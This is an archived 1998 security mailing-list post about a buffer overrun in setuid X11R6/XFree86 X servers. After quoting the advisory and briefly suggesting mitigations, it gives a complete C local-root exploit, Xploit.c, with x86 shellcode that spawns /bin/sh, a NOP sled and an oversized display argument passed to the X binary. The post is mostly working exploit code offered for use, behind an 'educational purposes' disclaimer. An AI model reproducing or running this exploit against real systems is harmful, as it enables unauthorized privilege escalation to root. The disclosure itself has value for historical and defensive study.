On Tue, 13 Jan 1998, Pavel Kankovsky wrote: -------------------------------------------------------------------------- =>On a system where X11R6-based Xserver (R5 is probably affected too) is =>installed setuid or setgid (e.g. typical XFree86 installation has XF86_* =>setuid root), local users can exploit a buffer overrun in its code and =>gain extra privileges (e.g. root privileges when Xserver is setuid root). =>Quick fix: remove setuid/setgid bit from all installed Xservers =>* use xdm or a safe setuid wrapper to start Xserver =>An actual exploit is left as an exercise for the reader. :) -------------------------------------------------------------------------- Hi, Here is an x86 exploit for the recently discovered X-server buffer overflow. This program has been tested on most XF86 servers ( version 3.2 ) shipped with Redhat-4.2 and on XF86_SVGA( version 3.2 and 3.3.1 ). It did not work on XF86_SVGA 3.1.x. Use a wrapper to check the arguments passed to the X server or use Solar Designer's kernel stack patch to prevent the overflow, Disclaimer: This program is for educational purposes only. Please do not misuse it. I cannot be held responsible for any damage caused by the use of this program by anyone. Rahul Sahadevan, Administrator, Dept of CS & A, Indian Institute of Sciences. -------------------------8<-------Xploit.c--------------------------------- /********************************************************** * Adapted from * * "Smashing The Stack For Fun And Profit" * * in Phrack-49 by Aleph One ( aleph1at_private )* * by * * Rahul Sahadevan. ( srahulat_private ) * **********************************************************/ /* Try 2 3 4 5 for OFFSET */ #define OFFSET 2 #include <string.h> #include <unistd.h> #include <errno.h> #define LENCODE ( sizeof( Code ) ) char Code[] = "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0" "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41" "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd" "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e" "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh"; char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1; char *args[] = { "X", "-nolock", Display, NULL }; main() { dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 ); __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000)); memcpy( ptr + 4, ptr, 0x3fc ); memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE ); memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE ); execve( "/usr/X11R6/bin/X", args, args + 3 ); perror( "execve" ); } --------------------------------8<-----------------------------------------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:06 PDT